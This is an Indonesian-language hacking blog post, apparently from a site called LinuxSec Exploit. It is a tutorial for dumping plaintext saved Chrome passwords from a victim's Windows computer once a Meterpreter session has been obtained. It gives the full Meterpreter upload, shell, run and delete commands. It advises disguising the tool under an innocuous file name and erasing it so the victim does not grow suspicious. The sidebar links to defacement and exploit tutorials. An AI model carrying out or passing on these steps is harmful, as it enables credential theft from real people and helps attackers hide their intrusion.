• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

Dump Chrome Saved Password on Meterpreter Session

March 6, 2016 by Jack Wilder 4 Comments

Dari hasil otak atik google tadi akhir nya saya punya ide untuk melakukan hal yang menarik ketika kita berhasil mendapatkan akses meterpreter di komputer korban. Yaitu kita bisa mendownlaod password yang tersimpan ( saved password ) di browser chrome mereka. Dan menariknya password ini output nya langsung plan text, tidak perlu di crack atau di hash lagi.

Langusng saja ya ke tutorial.

Pertama, kalian harus mendownload tools untuk melakukan melakukan dump password di chrome.
Download di Security Exploded . File nya masih berbentuk installer.
Atau kalau kalian ingin tools yang sudah ter ekstrak, kalian bisa mendownload nya disini :
Download Chrome Password Dumper
Langkah langkah mendapatkan meterpreter saya anggap kalian sudah mengerti.
kalau masih bingung cari refrensi sebanyak banyak nya di google.
Atau baca artikel ini :
Backdooring Exe File with Metasploit
Kalau korban menggunakan OS Windows 7 keatas, pandai pandai lah bermain soceng.
Skip..
Saya anggap kalian sudah mendownload chrome password dumper diatas dan sudah masuk sesi meterpreter.
Upload Password Dumper nya dari lokal machine kita ke OS target.
meterpreter> upload /path/to/ChromePasswordDump.exe jembut.exe
Saya upload tools tadi di Desktop korban dengan nama jembut.exe
Selanjutnya, kita spawn cmd via meterpreter nya.
meterpreter> shell
Sekarang kita jalankan passsword dumper nya dengan perintah :
C:UsersUzumakiDesktop> jembut.exe ( sesuaikan dengan nama file yang kalian upload )
Ane test di VM, jadi saved password nya cuma satu, kalau kalian dapet target asli pasti result lebih banyak.
Gak etis kan kalo ane buat tutorial harus ngorbanin orang lain. Hehe.
Oke, kalo data sudah dapet semua, jangan lupa tools tadi dihapus agar korban gak curiga.
Keluar dulu dari cmd.
C:UsersUzumakiDesktop> exit
Lalu hapus dengan command
meterpreter > rm jembut.exe ( sesuaikan )

Kalau kurang jelas saya sudah buatkan video nya :

Nah sekian tutorial kali ini.
Share ke teman teman mu biar makin banyak yang mastah. *kidding
NB : saya membuat tutorial ini dengan tangan saya sendiri, kuota saya sendiri, screenshoot saya sendiri, dan ketikan saya sendiri. jadi yang mau copas tolong pengertiannya. Tidak susah kan memberi sumber link hidup ke post ini ?
Shares

Filed Under: Uncategorized Tagged With: Hacking, Metasploit

Reader Interactions

Comments

  1. K31R00T says

    March 8, 2017 at 5:20 pm

    ijin share om LinucSec ^-^

    Reply
  2. marc kerol says

    July 8, 2017 at 10:01 am

    🙂

    Reply
  3. marc kerol says

    July 8, 2017 at 10:02 am

    b-(

    Reply
  4. Nandha says

    December 23, 2020 at 8:13 am

    Link You provided doesn’t Work for Chrome password dumper.
    Can You PLEASE send The link again

    Reply

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

Tutorial Deface – Menutup Halaman Depan Situs Target dengan JS Overlay

Deface WordPress dengan Exploit Themes Qualifire File Upload Vulnerability

Cara Deface dengan Exploit Slims CMS Senayan Arbitrary File Upload Vulnerability

Hack Targeted Website using Reverse IP

Deface dengan Metode Timthumb Remote Code Execution

Deteksi Celah No Redirect pada Suatu Situs menggunakan cURL

Cara Deface Website dengan Teknik Local File Inclusion

WordPress 4.7.0/4.7.1 Content Injection Exploit

Exploit WordPress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability

Tool Deface Opencart Bruteforce and Upload Image

LinuxSec / 63 queries in 0.08 seconds